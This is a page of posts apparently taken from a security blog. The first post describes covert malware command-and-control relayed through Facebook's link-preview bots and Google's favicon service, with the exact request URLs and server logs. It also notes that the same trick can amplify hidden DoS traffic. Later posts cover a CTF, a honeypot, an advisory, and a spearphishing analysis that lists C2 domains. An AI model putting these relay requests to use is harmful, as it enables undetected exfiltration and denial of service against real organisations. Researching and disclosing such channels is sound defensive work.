Security Art Work

In the world of advanced persistent threats or APTs, techniques used by malware artifacts play an important role in communication and exfiltering information via C2s (Command & Control). In this sense, there are as many as there are protocols and services and an attacker can draw from his/her imagination. As just small examples of “tricks” for disguising illegitimate traffic as apparently normal information are:

• HTTP requests to apparently licit pages, which have been cracked, housing C2 code.
• Overuse of DNS protocol to exfilter and communicate with attackers.
• Overuse of Google Calendar.

The above list can be almost as long as the number of present and past APT campaigns. In this post I’d like to offer a new form of exfiltration where the infected equipment and C2 don’t directly exchange information at any time. They do so through a legion of bots available to the great giants of the Internet: Google, Facebook or Twitter among others.

What are these bots for or what’s their function? With Facebook, they have a series of agents used to conduct a preview of the content in a link when a comment is posted on this social network. By doing so, it’s possible to present the user with the linked web content in a pleasanter way. So, when the link is received by Facebook they “order” their bots to visit the URL by extracting information from the associated web.

The reader will have realized that by controlling the URL which we want the bots to connect to, we have a way to send information to a domain owed by the attacker, redirecting the request via Facebook. This gives us the first “Infected equipment” -> “C2” communication channel. The request will go unnoticed by any of the victim’s possible security analysts as they’re really requests made against the social network.

The first obstacle to executing the redirection came from the need to have a valid Facebook account and be authenticated to post. Searching a bit further through their documentation, I found I could post without being authenticated. The magic was in the “Developers” section. I can hereby leave you with the GET request that allows you to control Facebook’s bots at your fancy and visit all you resend them.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMAIN TO VISIT
&locale=en_US
&numposts=2
&sdk=joey
&width=500

The quick-witted will have already realized that you can use this not only to exfilter information but also, for example, to conduct hidden DoS attacks or increase visitor counts. As an example, I’m giving you my apache log, after telling Facebook to visit my website.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1      
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987 
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"

The truth is you can get good amplification as one request to Facebook generated 43 GETs from 10 different bots to the desired website. But, I’m changing the subject, we’re with the APTs.

Now we can exfilter, we need to send control commands to the infected equipment in the victim organization. For this part we’ll look to the Google bots for help. These we can also control so that they not only visit what we want but also send our orders to the infected equipment.

Usually when a C2 wants to execute a command in the victim, it’s not done in the C2 -> “infected equipment” direction but just the opposite, as the malware carrier starts the communication.

Well, Google has a url through which, given a domain, it returns its own favicon, which is perfect for resending back the orders to be executed in the infected equipment.

http://www.google.com/s2/favicons?domain=DOMAIN-TO-VISIT

Once executed, we can see the next request made by the bot in the C2 log:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

In this favicon we could, using stenographic techniques for example, include the control information sent to the infected equipment. We have thus set up a bi-directional communication with the C2s without having a direct channel between the infected equipment and the command and control equipment, perfect for going unnoticed.

The other day, a friend told me that he was at work, having a coffee; one of those from the machine that are now standard in most companies, you know, a Nespresso. When he pushed the button something strange happened and the machine got stuck in a loop —they get more and more like computers— and the lights were flashing. He turned it off and then on again (my friend is a computer engineer) and everything worked out fine —just like a computer— and he could satisfy his need for caffeine.

A few minutes later, while enjoying his coffee and a chat (my friend is Spanish), he got a call from someone identifying themselves as a member of the coffee machine’s maintenance service staff asking him if there was any problem with the machine. With the coffee machine? No… well, yes, but how did you know? You have it monitored? It’s sent you a fault message? How did it do that? Ah! 3G… No, I didn’t know. Thanks. Bye.

My friend was somewhat mind-boggled. It hadn’t occurred to him the machine could have a direct line out. Not that it was a bad idea. In fact, it’s an excellent idea for the maintenance service, as they can detect faults, even carry out preventive maintenance and, of course, analyze user consumption patterns: when most coffees are taken, how long the machine is working, whether it usually runs out of water or the user fills it before it empties, whether it overheats. All the necessary information not only to maintain the machine, but to improve design on later versions as well, or even optimize performance by simply updating the software (firmware to be more exact) controlling the device.

[Read more…]

In line with a recent Security Art Work post, it is quite easy to come to the conclusion that corporate security makes no sense without user awareness and policy fostering.

Corporate security policies, if any, are often a pipe dream: Almost all employees are aware of them and only a few know some into detail, while only a couple of them are concerned to apply these policies conveniently.

However, these policies are the key for companies to protect important company assets, even more since new trends’ adoption like BYOD (Bring Your Own Device) or COPE (Company Owned Personally Enabled), where the company data flows across mobile devices and where the personal and professional use gets mixed.

If we could wish a system to foster our corporate security policies, our wish list would look like this:

• A system to enable awareness of corporate security policies, instead of reading the policies description. Additionally, it would be really good if it could provide “learn as you go” mechanisms, with recommendations on how to proceed for each situation.
• Make it multi-device and multi-platform (operating system), in order to allow using a wide range of smartphones and tablets, as well as our laptops.
• A framework that, depending on each situation, allows performing a risk analysis of the situation, to balance the best action from a security point of view, taking into account both risks and opportunities.
• A user-centric platform that allows operating without unnecessary interruptions. Ideally, it would be perfect if we barely notice that existence of it, just receiving recommendations in certain situations where there is a high risk for concrete company assets.

That said, as users of the system, we would still miss something very important:

• What about our privacy?
• What kind of interactions would monitor this system?
• Is our personal information safe?

Therefore, the final wish is that it would only collect the necessary data to ensure policy compliance, without storing personal information.

Let’s take an example to make it clearer: If the security policy claims that a blacklisted application should not be installed, the system should monitor only if that concrete application is installed on the device, discarding the information concerning other installed applications.

As for the information that the CSO (Chief of Security Operations) would receive, personal data would be encrypted. Only the action that jeopardizes the company information should be registered, not who came close to violate a corporate policy.

Hence, the goal is not to enable a system that controls users to throw warnings of punishment, but a system automating such control through automated recommendations. These recommendations are meant to reflect the evolution of corporate culture (security awareness), gradually and progressively acquiring corporate policies knowledge. In my opinion, much more bearable that reading an extensive document, with one more advantage: sometimes, documented policies are not easy to relate with our daily tasks.

All these wishes, as well as some ones that will emerge on our way, are the ones that we target in the MUSES project, whose motto is “Corporate security with the user at heart”, coordinated by S2 Grupo, with the participation of partners belonging to several European countries (Sweden, Germany, Austria, Switzerland, Belgium, Italy and Spain).

The possibility of sharing the project towards the creation of an open-source community is one of our main goals. Hence, everybody is welcome to participate on this open-source experience through the participation on our GitHub project.

Starting with this post, we will report on the project development. Meanwhile, please do not forget to follow the project on twitter (@MUSESproject) and facebook (MUSES Project).

Success is a journey, not a destination. We will keep you informed along the way.

Several months ago (october 2013, if I recall correctly), I found some vulnerabilities on an HMI from OMRON. I wrote a post in Spanish describing the almost endless process we went thru from the discovering of the vulnerability to its publication (you can check the automatic Google translation here, though I assume no responsability).

Ten months later, we got the green light from OMRON (with great work by ICS-CERT and other CERTs), probably mostly pressed by our decission to publish the vulnerability at mid-end July. Lucky we’re the good guys. Now the vulnerability has been released: Advisory (ICSA-14-203-01), Omron NS Series HMI Vulnerabilities, so let’s go with the (few) details.

[Read more…]

(Please note this post has been translated, so some strings may appear in Spanish, mainly services names)

In previous posts we have already talked about Dionaea (Spanish), a low-interaction honeypot that offers a variety of network services. The main problem we face when deploying a honeypot is how to customize its services to make them undetectable by scanning tools. The more an attacker takes to detect its interacting with a honeypot, the more likely we will be able analyze its methodology, capture exploits, binaries, etc.

We will install Dionaea and modify some of its services to avoid identification by the network scanner most popular: Nmap.

We can get Dionaea from its project page, with the steps for its installation. In our case we used Ubuntu 12.04 as the base operating system. Active services by default are:

[Read more…]

This time I would like to talk about a challenge I solved lastly and I found quite interesting. In that case, we should access to the private zone (protected with htaccess) of a website that we found there was a blind SQL injection vulnerability (widely known, but if someone does not know it, there is a lot of information on the Internet. For example in https://www.owasp.org/index.php/Blind_SQL_Injection).

In MySQL there is the function load_file that allows the access to a file if the user has the FILE privilege. So, the first thing we have to do is to check if we have this privilege.

Before proceeding, I would like to clarify that all the queries can be done manually – or with scripts done by oneself – but sometimes it is better to use tools already created that make the task much easier and faster. For example, sqlmap.org, is a really good tool to exploit SQL injection vulnerabilities.

[Read more…]

(Please note this post was originally published past 10th January in the Spanish version of SAW but we find it relevant —and couldn’t find time to translate until now— ;)

Lately, we are detecting a significant increase of Remote File Inclusion [1] attacks in which the same pattern is repeated in the payload of the attack. In these, the URL of injection used is always the same: http://www.google.es/humans.txt. Although the content of this file is not malicious, the amount and frequency of alerts that are detected show that there is a reconnaissance attacks campaign underway.

The attacking IP addresses are located worldwide (up to 10 countries have been detected, including Spain), which may indicate that one or more botnets are behind this attack. On average, over a period of 10 days, each one of these IP has attacked about 12 targets, generating between 2000 and 5000 alerts each one.

[Read more…]

A few days ago, we had a new challenge where we should find out what techniques or tips were being used lastly to install malware. To get this information, we only had a compressed file that had been captured.

When we open the file attachment.rar we see that there are three images of Roman ruins: “0.jpeg”, “1.png” y “3.jpg”.

Paying attention on these pictures, the only strange thing we observe it is that there are some Roman numeral in the bottom right corner of two of the pictures (“II” y “IV”) and also that it seems there is one picture missing (number “2”), because after number “1” we only have number “3”.

[Read more…]

After some time without any challenge, we come back with a new case where we should put in practice some techniques that could be used to get hidden information from apparently “normal” files .

In this case, we have captured an e-mail (with the attachment attachment.rar) belonging to a gang who is accused of vulnerabilities exploitation in different systems in order to install malware and spy everything that users do in their machines.

Although at first glance the captured file (attachment.rar) only appears to have three images, we believe that inside of it, some instructions or tips are given to know how they are installing the malware.

As usual, we have provided two rar files that require a password to be opened. The first one (validator1.rar) will be opened with the solution of part 1 of the challenge, and the second one (validator2.rar) with the solution for the second part. Please note that the challenge is not to try to crack these two files, since they only allow you to see if you have reached the right solution or not. In this occasion, to resolve the second part you should have solved the first one previously.

As always, the solution will be published in a few days on the blog. Anyway, if we see that there are questions about the challenge, we will publish some tips before the solution.

I hope you enjoy this challenge ;)

Between the 25th and the 27th of November, some public institutions in Europe were affected by a wave of targeted attacks (TAs). These attacks, which were made through e-mail, were very interesting: they made use of an infrastructure which had already been used in the past, in other malware campaigns.

Infection
As in most of these attacks, the infection vector was a spearphishing campaign. The e-mail messages had a MS Word document attached to them, and this document contained an embedded exploit that takes advantage of a vulnerability which has been known since 2012, more specifically, CVE-2012-0158.

The domain in the “FROM” field of the e-mails belongs to one of the most well-known humanitarian organizations, which made the e-mail messages look completely reliable.

The subjects in the different e-mails made reference to dates close to those of the attacks, except for one of them, which advertised the “Top 10 Cities with the Most Beautiful Women”… quite appealing.

Fw: 2013-11-27
Fw: Top 10 Cities with the Most Beautiful Women
RV: Teheran 2013-11-25

The same references appeared in the names of the attached files.

27-11-2013.doc
20131125.doc
Top 10 Cities with the Most Beautiful Women.doc

Thanks to the existing patching and updating policies, the attack’s impact was null: the MS Word document took advantage of an old vulnerability that affects ActiveX controls and allows remote code execution, butthis vulnerability had already been patched in April 2012.

Hashes
Alter calculating the hash function for each file, it became obvious that we were dealing with only two different documents.

1598f39b5d670eb0149141df7bbcc483
60fd6b6bcf73586284ab8c403c043c6e

After checking these MD5 at Virustotal, we could see that someone had already uploaded them before. Therefore, from that moment onwards, the samples were processed as public information.

I will now briefly break down the analysis. This is not a complete analysis of the samples. I will only show the useful information that we have used to solve the incident.

The following files were dropped after the execution of each of the two documents.

Even though, cross-referencing these with previous tables, some identical files can be found.

If you want to take an in-depth look at the analyses, you can find them in the following links at malwr.com:
1598f39b5d670eb0149141df7bbcc483 @ malwr.com
60fd6b6bcf73586284ab8c403c043c6e @ malwr.com

Domains
After executing the files in a cuckoo box and infecting a virtual machine by manually executing the files named “kav.exe”, we were able to see that each one of the samples would connect to a different domain:

yahoo.offlinewebpage.com
link.antivirusbar.org 

This explains why, even if the behavior is equal in both files, the MD5 signature is different for each of them.

In addition, thanks to some information received from external sources, the following domain can also be added to thislist:

ks.pluginfacebook.com

When requesting one of these domains, we always have the same response:

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Date: Wed, 27 Dec 2013 15:23:45 GMT
Accept-Ranges: bytes
Content-Length: 362
X-Cache: MISS from ta-prx21
X-Cache-Lookup: MISS from ta-prx21:3128
Via: 1.0 ta-prx21 (squid/3.1.20)
Connection: keep-alive

.
.
..
.
...U.n.d.e.r. .C.o.n.s.t.r.u.c.t.i.o.n.<./.s.p.a.n.>.<./.d.i.v.>.
.
...w.w.w...m.i.c.r.o.s.o.f.t...c.o.m.<./.s.p.a.n.>.<./.d.i.v.>.
.
.<./.b.o.d.y.>.
.
.<./.h.t.m.l.>.
.
.

By accessing the domain through an outdated browser, we cannot see any kind of odd behavior and we obtain the expected response:

Atribution

By doing whois to the domains, the following email addresses and domain name registers appeared:

qingwa20112011[at]163[dot]com
dnsjacks[at]yahoo[dot]com 
usa87654310[at]126[dot]com

All the domains, as well as the e-mail addresses of the domain registers, point to China, as it can be seen in this list of e-mails related to TAs originated in China.

A quick search on Google about de involved e-mailsis enough to see that the address dnsjacks[at]yahoo[dot]com is related to a Mirage campaign originating from China.

Analyzing the requests that appeared in the Mirage campaign and comparing them with the ones found in the attack, we can find some similarities.

In addition, if we analyze the receivers of the e-mails, we can see that this attack didn’t have only one target, but rather that several public institutions in Europe were targeted.

The fact that an infrastructure from the past was being used, together with the sending of e-mails with a lot of receivers and the nature of Mirage malware, allows us to conclude that this was not a stealthy attack.This makes us think that this attack was just an attempt to steal very specific information (probably financial information) in a quick way.

This kind of attack is quite common in public institutions and it is very common to use spearphising as the infection vector. The use of trusted domains such as a well-known humanitarian organization makes this e-mail seem legit,which turns its detection into a very hard task.

Either way, the prevention of these attacks is usually simple and it comes hand in hand with a quick implementation of the software updates and security patches. This is because most of these attacks do not use 0days, but, instead, they use well-known vulnerabilities which are already patched. For example, in this case, they were using a vulnerability that was more than one year old.

In order to detect if your organization has been affected by this wave of TAs, just search for the domains listed above in the navigation logs.

I hope this article has been useful or that, at least, it has been interesting to read.